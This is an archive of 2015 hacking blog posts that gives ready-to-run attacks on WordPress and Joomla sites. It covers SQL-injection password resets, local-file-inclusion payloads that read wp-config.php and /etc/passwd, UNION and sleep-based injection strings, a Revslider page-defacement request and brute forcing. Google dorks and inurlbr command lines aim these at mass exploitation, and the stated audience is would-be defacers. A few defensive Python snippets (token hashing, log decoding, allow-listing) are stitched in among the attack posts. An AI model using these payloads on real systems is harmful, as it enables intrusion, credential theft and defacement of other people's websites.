
Thursday, July 30, 2015

Resetting WORDPRESS/JOOMLA passwords via SQL injection

[0x00] Introduction

Well, let's go: this article is quite simple but very useful for the kids who like a defacement but don't have much knowledge and spend a long time trying to "crack" a hash from these CMSs.

[0x01] Joomla concept

I'm not sure we can call it a concept, but the term fits well, and if memory serves I've already seen a similar article somewhere; I just don't remember the author.

[0x01a] The hash
   The hash used by Joomla is a kind of MD5 that splits the password into parts after the ':'; if the number of characters is odd, one more is added to the first MD5.

[0x01b] Example:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 the part in black corresponds to 0X4 and the part highlighted in red to h4x

[0x02] Injection

It is very similar to a normal SQL injection; we only change the tables and columns to be exploited. In a normal case we would be after the columns that store the username and password, but this time we look for the table that holds the activation codes and the email.

[0x02b] Target table
 The target is _user; the name can vary, but in 90% of cases it contains _user, and we take the email and activation columns.
We take the email and enter it at alvo.ru/index.php?option=com_user&view=reset; after that, just enter the code taken from the activation column and it will be possible to choose a new password.

[0x03] WordPress concept

Not much changes from the Joomla injection; it just has a type of hash that is so far "unknown".

[0x03a] Target table and columns
                 The target table is wp_users and the columns are user_login and user_activation_key.

[0x03b] Resetting
    It is very similar to Joomla; only the path changes, since they are different CMSs. First we go to alvo.ru/wp-login.php?action=lostpassword and enter the user whose password we want to change (the user obtained from user_login); after that we go to /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] WordPress explanation

Well, I believe everyone has understood the l33ts and h4x0r part, but for the inattentive: where the URL has l33ts you put the corresponding code obtained from user_activation_key, and where h4x0r sits goes the user obtained from user_login.

Solution?
Keep your CMS always updated and stay informed about new flaws.
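A defensive counterpart to the reset flow above, added here as an example (it is not code from the post, from Joomla or from WordPress): the activation/reset token is stored only as a hash, with an expiry and single use, so reading the users table through SQL injection yields nothing that works in the reset URL. The USERS table, TOKEN_TTL and all function names are assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Constructed stand-in for the users table the post reads (user_login /
# user_activation_key); a real deployment would use the database.
USERS = {
    "h4x0r": {"email": "h4x0r@example.invalid", "key_hash": None, "expires": 0.0},
}

TOKEN_TTL = 3600  # seconds a reset link stays valid (assumed policy)


def _hash_token(token):
    # SHA-256 is enough here: the token is 32 random bytes from secrets,
    # not a human-chosen password, so guessing it is infeasible anyway.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(login, now=None):
    """Create a reset token for `login`. Returns the plaintext token, which
    goes out by e-mail only; the table keeps just its hash and an expiry."""
    user = USERS.get(login)
    if user is None:
        return None
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    user["key_hash"] = _hash_token(token)
    user["expires"] = now + TOKEN_TTL
    return token


def verify_reset_token(login, token, now=None):
    """Accept `token` only if its hash matches (constant-time compare), the
    link has not expired, and it has not been used; burn it on success."""
    user = USERS.get(login)
    if user is None or user["key_hash"] is None:
        return False
    now = time.time() if now is None else now
    if now > user["expires"]:
        return False
    if not hmac.compare_digest(_hash_token(token), user["key_hash"]):
        return False
    user["key_hash"] = None  # single use: a replayed link must fail
    return True


def stolen_column_is_useless(login, now=None):
    """Model the post's SQL injection: the attacker reads user_activation_key.
    With hashing in place that value is the hash, and presenting it as the
    token fails verification."""
    stolen = USERS[login]["key_hash"]
    return stolen is not None and not verify_reset_token(login, stolen, now)
```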

Wednesday, June 24, 2015

WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR

Exploiting the RobotCPA V5 plugin in the WordPress CMS

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Access: https://www.exploit-db.com/exploits/37252/


The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Example injection:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using the GET exploit parameters and the scanner's internal encoder

Example:
--exploit-get {you_get}
--exploit-get  "&index.php?id=10'´0x27"


base64 Encode values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

inurlbr internal validation script

Checking for the server's password file...

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including files that are already locally present on the server, through the exploitation of vulnerable inclusion procedures implemented in the application.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
If any of these values is found in the response, the script flags the target as vulnerable.
Checking for the server's wp-config.php file...

CMS WORDPRESS
As the name suggests, if the web application doesn't check the file name requested by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability, file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
If any of these values is found in the response, the script flags the target as vulnerable.

Download:
http://github.com/googleinurl/SCANNER-INURLBR

Tuesday, June 9, 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploiting a WordPress plugin LFI using inurlbr in subprocess mode

Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Make a file named payload.txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

OTHER FAILURES(XPL's):


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique

Video:



SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

Thursday, May 7, 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 
---------------------------------------------------------------------------

[ + ] OUTPUT VULN
-s sqli.txt  
---------------------------------------------------------------------------

[ + ] ID SEARCH ENGINES: 1 = GOOGLE + CSE, 6 = GOOGLE API
-q 1,6 
---------------------------------------------------------------------------

[ + ] EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'
---------------------------------------------------------------------------

[ + ] TYPE INTERNAL VALIDATION
-t 2 
---------------------------------------------------------------------------

[ + ] SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 
---------------------------------------------------------------------------

[ + ] FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique
---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)
---------------------------------------------------------------------------

- We pass the hexadecimal value '0x78706c5f73756363657373' in our SQL injection.

If the string 'xpl_success' appears in the HTML returned by our target, it means it was exploited successfully.


In short, I pass a predefined value in hexadecimal format in the SELECT of my SQL injection; if that value comes back as a string, it means it was executed successfully.
In the tutorial I converted the string xpl_success to hexadecimal, which gives 78706c5f73756363657373; I inject it, the server executes it and prints it to the client.
In the INURLBR script the -t level 2 parameter means validation with a custom search inside the target, for when I want to find a specific string, which is why we use the complementary -a command; -t 2 disables the search for other SQLi errors and focuses only on the string passed via -a 'your_string'.



if(HTML == xpl_success){ OK }
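An added example (not code from the post or from inurlbr) serving both the RobotCPA post above and this one: a log check that undoes the two encodings the two posts rely on, base64 in the plugin's l parameter and MySQL 0x hex literals inside a UNION SELECT, so an analyst reviewing access logs sees the stream wrapper, the traversal or the marker string instead of an opaque blob. The log lines are constructed; the regexes and function names are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined-log style, trimmed); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jun/2015:10:01:02 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 1843
203.0.113.5 - - [24/Jun/2015:10:01:09 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA== HTTP/1.1" 200 2210
198.51.100.7 - - [07/May/2015:11:15:40 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%20and%201=2%20union%20select%201,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12%20from%20wp_users%20where%20id%20%3E%200 HTTP/1.1" 200 9120
192.0.2.9 - - [07/May/2015:11:16:01 +0000] "GET /?fbconnect_action=myhome&fbuserid=1 HTTP/1.1" 200 9120
192.0.2.9 - - [07/May/2015:11:16:30 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=aG9tZQ== HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/')
WRAPPER_RE = re.compile(r"^(?:php|file|data|expect|zip|phar)://", re.I)
TRAVERSAL_RE = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]+)")
UNION_RE = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)


def try_base64(value):
    """Return the text `value` encodes if it is valid base64 text, else None."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def decode_hex_literals(value):
    """Decode MySQL 0x... literals (used to hide marker strings) to text."""
    decoded = []
    for hexdigits in HEX_LITERAL_RE.findall(value):
        if len(hexdigits) % 2:
            continue
        try:
            decoded.append(bytes.fromhex(hexdigits).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze_url(url):
    """Return (parameter, finding, evidence) tuples for one request URL."""
    findings = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            # Inspect the raw value and, when it is base64, the decoded form too.
            candidates = [value]
            decoded = try_base64(value)
            if decoded is not None:
                candidates.append(decoded)
            for cand in candidates:
                if WRAPPER_RE.search(cand):
                    findings.append((name, "stream-wrapper", cand))
                if TRAVERSAL_RE.search(cand):
                    findings.append((name, "path-traversal", cand))
            if UNION_RE.search(value):
                markers = decode_hex_literals(value)
                findings.append((name, "union-select", ",".join(markers) or value))
    return findings


def scan_log(text):
    """Return (client_ip, url, findings) for every log line with a finding."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = match.group("url")
        findings = analyze_url(url)
        if findings:
            hits.append((line.split()[0], url, findings))
    return hits


if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        for name, kind, evidence in findings:
            print(f"{ip} {kind:<15} {name}= {evidence}")
```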


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VIDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790

Tuesday, April 21, 2015

WordPress NEX-Forms 3.0 SQL Injection Vulnerability

The "submit_nex_form" ajax function is affected by a SQL injection vulnerability

  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  -----------------------------------------------------------------------------

# AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
# Email:        [email protected]
# Blog:          http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:    https://fb.com/InurlBrasil
# Pastebin     http://pastebin.com/u/Googleinurl
# GIT:           https://github.com/googleinurl
# PSS:           http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS:          http://google.com/+INURLBrasil

- Discovery: http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
- Vulnerability discovered by: Claudio Viviani
  -----------------------------------------------------------------------------

- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
- VENDOR:       https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Dork Google:  inurl:nex-forms-express-wp-form-builder
- Dork Google:  index of nex-forms-express-wp-form-builde
- GET VULN:     nex_forms_Id=(id)
- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
  -----------------------------------------------------------------------------

- DBMS:        'MySQL'
- Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
  -----------------------------------------------------------------------------

Info:  The "submit_nex_form" ajax function is affected by a SQL injection vulnerability
POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
  -----------------------------------------------------------------------------

- --help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
  -----------------------------------------------------------------------------

- EXPLOIT MASS USE SCANNER INURLBR
- COMMAND: 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"

- DOWNLOAD INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
  -----------------------------------------------------------------------------

- INFO:           http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/

[!] CODE XPL:
- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability

OUTPUT SQLMAP: 
 [03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [03:25:12] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux
 web application technology: PHP 5.4.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12

Thursday, April 9, 2015

SUB_PROCESS CONCEPT / SCANNER INURLBR 2.0

 SUB_PROCESS - Consists of concatenating a series of strings based on a predefined file.

============================================================


[!] LIST OF STRINGS TO BE EXECUTED (concatenated) FOR EACH TARGET FOUND.

  1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt

File contents - URL XPL WordPress Arbitrary File Download Vulnerability:


--------------------------------------------------------------------------------------

[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
 It already has this validation by default, built in.

  • ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
  • ['CMS-WORDPRESS-02'] = "define('DB_USER'";
  • ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
  • ['CMS-WORDPRESS-04'] = "define('DB_HOST'";

--------------------------------------------------------------------------------------

 [!] Running subprocesses:
 
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-post

[!] Description of the command used:

  1. SET DORK:                --dork 'DORK'
  2. SET OUTPUT FILE:         -s 'output.txt'
  3. SET SUBPROCESS FILE:     --sub-file 'file_subprocess.txt'
  4. REQUEST TYPE FLAG:       --sub-get / FLAG
  5. HOST FILTER FLAG:        --unique  / UNIQUE HOSTS IN YOUR RESULT


[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique
--------------------------------------------------------------------------------------

EACH BAR THAT IS SHOWN IS A VALIDATION PROCESS.
In the same way I used some WordPress xpls (strings/URLs), those of other CMSs can be used...
or standard URLs to try to trigger SQLi errors on the server; LFI attacks in the same way.

[!] DEMO VIDEO:

Download the INURLBR 2.0 scanner:
https://github.com/googleinurl/SCANNER-INURLBR




[ Neither war between hackers, nor peace for the system. ]



Tuesday, March 31, 2015

Inurlbr dorking + Wordpress brute forcing

    Hey folks, these days I was researching some WordPress flaws, so I had the idea of building a script that performs a brute force on WordPress sites, but first it collects the sites running the CMS (WordPress) and saves them to a .txt.

    I thought of doing this dorking step by hand, but why go to all that trouble when you can use our Inurlbr scanner <3 with the dorks already defined. After collecting the URLs in the dorking step with Inurlbr, I built the script that checks whether that URL runs WordPress or not; if it doesn't, it prints "Not is wordpress" on screen, otherwise it performs the brute force with the default passwords contained in the code. The script has few passwords, but you can add more passwords, or if you have a little knowledge of Python you can make the script load a wordlist.txt.

   You can choose to do the dorking step manually or let the script do it for you; on execution it will ask you: Dorking use to find sites using the inurlbr? [Y][N].



[ COMMAND SCANNER INURLBR ]

  • ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
  • You can add more dorks to the scanner command, separating them with "[DORK]"

  [DEMO]






Tuesday, March 24, 2015

WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

An exploit that makes it possible to modify the page's HTML file. The Revslider plugin for the WordPress CMS is well known for other security holes; well, this time it is possible to make a small modification to the get_captions_css file.

Sending the request:
Via POST with the following fields:
array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
 "data" => "_YOU_HTML_ADD_"
 );

The data field is where we send our modified HTML.
Our POST array with the data already filled in is sent to the following
URL - POST: http://{target}/wp-admin/admin-ajax.php

With the whole process finished, we can check whether the target's HTML was modified.
URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

USING THE EXPLOIT:
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'



OUTPUT COMMAND -t:

OUTPUT COMMAND -f targets.txt:


Mass use with SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR

COMMAND:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'


Thursday, March 12, 2015

WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR

The WordPress SEO by Yoast plugin is used by millions of WordPress sites that want to be found on the internet. The WordPress SEO by Yoast plugin is a free plugin focused on search engine optimization of sites, with the aim of raising their page ranking in search engines.

Technical description:

The authenticated blind SQL injection vulnerability can be found inside the file 'admin/class-bulk-editor-list-table.php'. The GET parameters orderby and order are not sufficiently sanitized before being used inside a SQL query.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

$order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );


Proof of Concept (PoC):
The following GET request will make the SQL query execute and sleep for 10 seconds if clicked as an authenticated administrator, editor or author user.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
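An added example (not the plugin's or the advisory's code) showing why the escaping on lines 529 and 533 does not help: an ORDER BY identifier is never quoted, so esc_sql-style escaping leaves the payload intact, whereas an allow-list of column names does not interpolate user input at all. The escape function is an assumed stand-in for esc_sql(), and because SQLite has no SLEEP(), the constructed payload references a missing table so that execution of the injected subquery is observable.

```python
import sqlite3

# Allow-lists for the two GET parameters (assumed set of sortable columns).
ALLOWED_ORDERBY = {"post_title", "post_date", "post_modified", "ID"}
ALLOWED_ORDER = {"ASC", "DESC"}


def escape_like_esc_sql(value):
    """Stand-in (assumption, not WordPress code) for what esc_sql() does to a
    string: escape quotes and backslashes. It never touches commas,
    parentheses or keywords, which is all an ORDER BY payload needs."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_order_clause(orderby, order):
    """Hardened form: identifiers are never interpolated from user input;
    they are mapped through an allow-list, with defaults for anything else."""
    col = orderby if orderby in ALLOWED_ORDERBY else "post_title"
    direction = order.upper() if order.upper() in ALLOWED_ORDER else "ASC"
    return f"ORDER BY {col} {direction}"


def vulnerable_query(orderby, order):
    # Mirrors the plugin's pattern: escaped, but still concatenated into an
    # identifier position where quoting does not apply.
    return ("SELECT ID, post_title FROM posts ORDER BY "
            f"{escape_like_esc_sql(orderby)} {escape_like_esc_sql(order.upper())}")


def safe_query(orderby, order):
    return f"SELECT ID, post_title FROM posts {build_order_clause(orderby, order)}"


def run(sql):
    """Execute `sql` against a constructed in-memory table; return
    ('ok', rows) or ('error', message)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE posts (ID INTEGER, post_title TEXT, post_date TEXT);"
        "INSERT INTO posts VALUES (1, 'b-post', '2015-03-12'), (2, 'a-post', '2015-03-01');"
    )
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    finally:
        conn.close()


# The post's payload uses MySQL's SLEEP(); SQLite has no SLEEP, so this
# constructed payload references a table that does not exist instead: if the
# injected subquery is executed at all, the database reports it.
PAYLOAD = "post_date,(select * from (select * from no_such_table)a)"

if __name__ == "__main__":
    print("escaped payload unchanged:", escape_like_esc_sql(PAYLOAD) == PAYLOAD)
    print("vulnerable:", run(vulnerable_query(PAYLOAD, "asc")))
    print("hardened:  ", run(safe_query(PAYLOAD, "asc")))
```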


DORK: inurl:admin.php?page=wpseo_bulk

I developed a mini exploit to be run together with SCANNER INURLBR or separately, as you prefer, using sqlmap for the exploitation.
The INURLBR scanner does all the searching and then the mini exploit exploits the target with sqlmap.

Optimization:
FULL: http://pastebin.com/gi1Q4NmQ

RUN THE MINI EXPLOIT: php mini_exploit.php www.target.com.br
INURLBR COMMAND:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_" 

REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/

Thursday, February 19, 2015

Meet CMSmap, the Python scanner that checks (WordPress, Joomla and Drupal)

CMSmap is an open-source Python CMS scanner that automates the process of detecting security flaws in the most popular CMSs. The main goal of CMSmap is to integrate the common vulnerabilities of different types of CMSs into a single tool.

At the moment, the CMSs supported by CMSmap are WordPress, Joomla and Drupal.

Please note that this project is at an early stage. As such, you may find errors, failures or malfunctions. Use at your own risk!

Installation directly from GIT:
git clone https://github.com/Dionach/CMSmap.git


CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti [email protected]
Usage: cmsmap.py -t 
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Using CMSmap to attack targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Monday, January 19, 2015

wp-backup-plus: Wordpress Database File Download filter with inurlbr

Wordpress File Download Database 

The WP Backup Plus Plugin:
The Full Automated Wordpress Backup Plugin that sends your backup to multiple locations that allows you to backup, restore, automate, and clone.

DORK: index of "wp-backup-plus"

(Priv8) method for using the downloaded file to deface the server, and how to find the file-download script on WordPress sites; it can be exploited on all WordPress versions.

[TUTORIAL]

Using inurlbr scanner to filter

COMMAND INURLBR:
php inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

[RESULT SHORT]

DOWNLOAD THE TOOL INURLBR: 
https://github.com/googleinurl/SCANNER-INURLBR

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All the themes above fail through the same Revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

The exploit checks about 20 themes and also tests the generic path
POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
which is the same vector as the 0days listed above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Download the exploit and save it as exploit.php.

Now let's use the inurlbr scanner to run the exploit against every search result (mass exploitation)
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR (template):
Ex: php inurlbr.php --dork 'your dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction to --comand
